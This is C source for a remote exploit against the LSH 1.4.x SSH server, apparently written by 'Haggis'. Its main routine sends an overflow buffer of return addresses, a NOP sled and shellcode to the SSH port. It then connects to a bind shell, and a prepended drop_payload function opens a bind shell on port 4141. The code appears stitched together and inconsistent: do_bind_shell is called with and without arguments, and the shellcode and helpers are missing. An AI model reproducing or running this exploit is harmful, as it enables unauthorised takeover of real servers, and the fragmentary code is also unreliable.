void drop_payload() { char* env_path = prepare_payload(); printf("will launch a shell with this environment: %s\n", env_path); do_bind_shell(env_path, 4141); free(env_path); }
main(int argc, char **argv) { int ch, i, targetSock; unsigned long *retPtr; char *charRetPtr; printf("LSH 1.4.x (others?) exploit by Haggis ([email protected])\n\n"); while((ch=getopt(argc, argv, "t:T:h"))!=-1) { switch(ch) { case 't': strncpy(host, optarg, SIZ-1); break; case 'T': useTarget=atoi(optarg); break; case 'h': default: printf("%s\n",usage); printf("Available platforms:\n"); for(i=0;targets[i].platform;i++) printf(" %2d. %s\n", i, targets[i].platform); printf("\n"); exit(0); break; } } if(host[0]=='\0') { printf("[*] You must specify a host! Use -h for help\n"); exit(1); } if((hostStruct=gethostbyname(host))==NULL) { printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]); exit(1); } if((targetSock=connect_to_host(SSH_PORT))==-1) { printf("[*] Coulnd't connect to host %s\n", host); exit(1); } my_recv(targetSock); printf("[-] Building exploit buffer...\n"); retPtr=(unsigned long *)buf; for(i=0;i<EXPLOIT_BUF_SIZE/4;i++) *(retPtr++)=targets[useTarget].retAddr; charRetPtr=(unsigned char *)retPtr; for(i=0;i<NOPS_LEN-strlen(shellcode);i++) *(charRetPtr++)=(unsigned long)0x90; memcpy(charRetPtr, shellcode, strlen(shellcode)); *(charRetPtr+strlen(shellcode))='\n'; *(charRetPtr+strlen(shellcode)+1)='\0'; printf("[-] Sending exploit string...\n"); my_send(targetSock, buf); close(targetSock); printf("[-] Sleeping...\n"); my_sleep(100000); printf("[-] Connecting to bindshell...\n"); if(do_bind_shell()==-1) printf("[*] Could not connect to %s - the exploit failed\n", host); exit(0); }